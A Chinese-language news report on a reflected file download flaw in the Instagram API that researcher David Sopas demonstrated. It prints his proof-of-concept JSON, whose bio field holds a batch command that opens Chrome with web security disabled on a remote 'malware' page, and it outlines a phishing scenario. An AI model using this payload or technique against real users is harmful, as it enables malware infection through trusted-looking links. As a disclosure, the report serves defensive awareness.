安全研究人員最近發(fā)現(xiàn)了一種利用Instagram API形成的惡意分享鏈接，由于這個(gè)鏈接指向Instagram域名，所以很容易被用戶相信并下載。如果在釣魚攻擊中利用該漏洞，可以極大地提高攻擊效率。

[[130590]]

漏洞詳情

這個(gè)RFD(反射型文件名下載)漏洞存在于Instagram API中。通過篡改任何用戶賬號(hào)的訪問令牌并使用一些技巧，攻擊者可以創(chuàng)建一個(gè)惡意文件下載鏈接。同時(shí)由于這個(gè)鏈接指向Instagram域名上的合法資源，所以很難被用戶覺察。

為了構(gòu)建“反射型部分”，Sopas在用戶賬號(hào)的“Bio”域中插入了一個(gè)批處理指令，并解釋說插入到其他域也可以實(shí)現(xiàn)同樣的功能。然后，他用Chrome瀏覽器打開一個(gè)包含惡意代碼的新頁(yè)面，該惡意頁(yè)面可以禁用瀏覽器中的大多數(shù)保護(hù)機(jī)制。

通過分析了用戶的Instagram JSON文件，然后通過修改JSON文件來實(shí)現(xiàn)“文件名部分”：

https://api.instagram.com/v1/users/1750545056?access_token=339779002.4538cdb.fad79bd258364f4992156372fd01069a

{“meta”:{“code”:200},”data”:{“username”:”davidsopas”,”bio”:”\”||start chrome websegura.net\/malware.htm –disable-web-security –disable-popup-blocking||”,”website”:”http:\/\/websegura.net”,”profile_picture”:”https:\/\/igcdn-photos-f-a.akamaihd.net\/hphotos-ak-xaf1\/t51.2885-19\/11055505_1374264689564237_952365304_a.jpg”,”full_name”:”David Sopas”,”counts”:{“media”:0,”followed_by”:11,”follows”:3},”id”:”1750545056″}}

由于“文件名部分”的限制，這種附加方法只能在特定的瀏覽器中正常工作，這些瀏覽器包括Chrome、Opera、Chrome安卓版、安卓stock瀏覽器和火狐瀏覽器。

攻擊演示視頻

在他的攻擊中，Sopas使用了一個(gè)特定的文件名，他創(chuàng)建的完整鏈接可以被發(fā)送到受害者的Instagram消息中。

下面的視頻演示了該攻擊的PoC：

Sopas假設(shè)了以下可能的攻擊場(chǎng)景：

1、惡意用戶向他所有的Instagram好友發(fā)送一條消息，其中包含一個(gè)指向惡意頁(yè)面的鏈接。

2、受害者點(diǎn)擊鏈接，檢查并發(fā)現(xiàn)該文件存儲(chǔ)在Instagram服務(wù)器，下載并運(yùn)行它。

3、受害者感染惡意軟件。